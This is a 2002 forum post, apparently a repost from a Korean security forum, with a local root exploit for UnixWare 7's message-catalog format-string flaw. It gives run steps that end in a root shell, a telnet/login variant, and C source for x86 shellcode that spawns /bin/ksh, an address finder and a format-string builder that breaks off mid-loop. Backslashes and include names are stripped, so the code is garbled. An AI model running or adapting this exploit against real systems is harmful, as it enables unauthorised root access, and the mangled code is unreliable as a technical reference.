-
February 12th, 2002, 06:19 AM
#1
Exploit: Unixware Message catalog exploit code
This exploit is fixed already.
Crackers can modify message catalog and,
It can possible format string exploit.
$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
...........(wait 30 minutes ). ......
# id
uid=0(root) gid=3(sys) ......................
This can exploit all of unixware 7 setuid/setgid
command.
Also, can exploit telnetd and login.
example)
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
#
------------------------------------------------
Korean security forum
http://www.forsecure.com
http://www.netemperor.com
------------------------------------------------
Here is code.
------------------ expshell.c ------------------
#include
char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx1a" /* jmp */
"x33xd2" /* xorl %edx,%edx */
"x58" /* popl %eax */
"x8dx78x14" /* leal 0x14(%eax),%edi */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xab" /* stosl %eax,%es:(%edi) */
"x92" /* xchgl %eax,%edx */
"xab" /* stosl %eax,%es:(%edi) */
"x88x42x08" /* movb %al,0x8(%edx)
*/
"x83xefx3b" /* subl $0x3b,%edi */
"xb0x9a" /* movb $0x9a,%al */
"xab" /* stosl %eax,%es:(%edi) */
"x47" /* incl %edi */
"xb0x07" /* movb $0x07,%al */
"xab" /* stosl %eax,%es:(%edi) */
"xb0x0b" /* movb $0x0b,%al */
"xe8xe1xffxffxff" /* call */
"/bin/ksh"
;
main(int argc, char *argv[])
{
char buff[1024];
sprintf(buff, "EGG=%s", shellcode);
putenv(buff);
putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
---------------------------------------------------------------
---------------- getret.c --------------------
main()
{
char *a;
a = getenv("EGG");
printf ("e=%pn", a);
}
-----------------------------------------------
---------------- fmt_exp.c -----------------------------
#include
#include "shellcode.h"
/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268
main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;
if(argc 3) {
printf("Usage: %s ret-address offsetn", argv[0]);
exit(1);
}
retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;
fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.n"); exit(1);
}
for(count=0; count
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|